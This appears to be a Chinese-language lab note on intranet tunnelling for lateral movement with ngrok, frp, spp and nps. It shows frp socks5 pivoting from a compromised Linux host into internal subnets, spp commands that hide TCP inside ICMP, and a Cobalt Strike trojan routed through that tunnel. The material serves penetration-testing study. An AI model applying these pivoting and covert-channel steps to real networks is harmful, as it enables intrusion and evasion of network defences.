1.ngrok
建立内网主机与公网跳板机的连接:
内网主机为客户机:
下载客户端执行
2.frp
(1)以下为内网穿透端口转发
frp服务端配置:
bindPort 为frp运行端口
服务端运行 ./frps -c frps.ini
frp客户端配置:
serverAddr为服务端ip
serverPort为服务端工作端口与上述相同
type为工作协议
localIp为本地ip地址
localPort为需要转发的端口
remote为远程服务端转发端口
对应关系为 本地22端口对应远程服务端6000端口
(2)作为代理测试
网络架构图如下:
利用nat模拟外网地址
假设攻击者拿下linux1,想要访问192.168.11.0/24资产
利用frp搭建隧道:
linux1运行客户端,配置如下
serverAddr为远程vps ip,启动插件socks5
服务端配置如下:
使用proxifier 进行sock5代理配置
配置仅访问11.0/24网段启动
初次点击添加:
配置完毕访问
配置访问22.0/24网段
拿下目标windows10配置访问22网段
此时linux1作为vps的客户端,作为linux2的服务端
作为服务端配置:
windows10客户端配置:
使用proxifier进行配置:
并在规则处添加
(3).本次实验参考文章
frp多层内网隧道搭建 proxychains及proxyfier多层代理详细设置_frp代理-CSDN博客
3.sapp
客户端运行:
.\spp.exe -name "test" -type proxy_client -server 服务端ip -fromaddr :本地转发的端口 -toaddr :转发到服务端的端口 -proxyproto tcp -proto ricmp
tcp -proto ricmp代表将tcp协议以ricmp出站传输
服务端运行:
./spp -type server -proto ricmp -listen 0.0.0.0
协议为icmp,监听所有端口
cs 生成木马:
选择icmp1生成木马,当客户端运行木马后流量从本地8081端口转发到目标8082端口,以icmp协议传输。
4.nps
启动nps
./nps install
./nps
更改配置:vim /etc/nps/conf/nps.conf
隧道搭建:
映射关系为:服务端:5566对应本地6666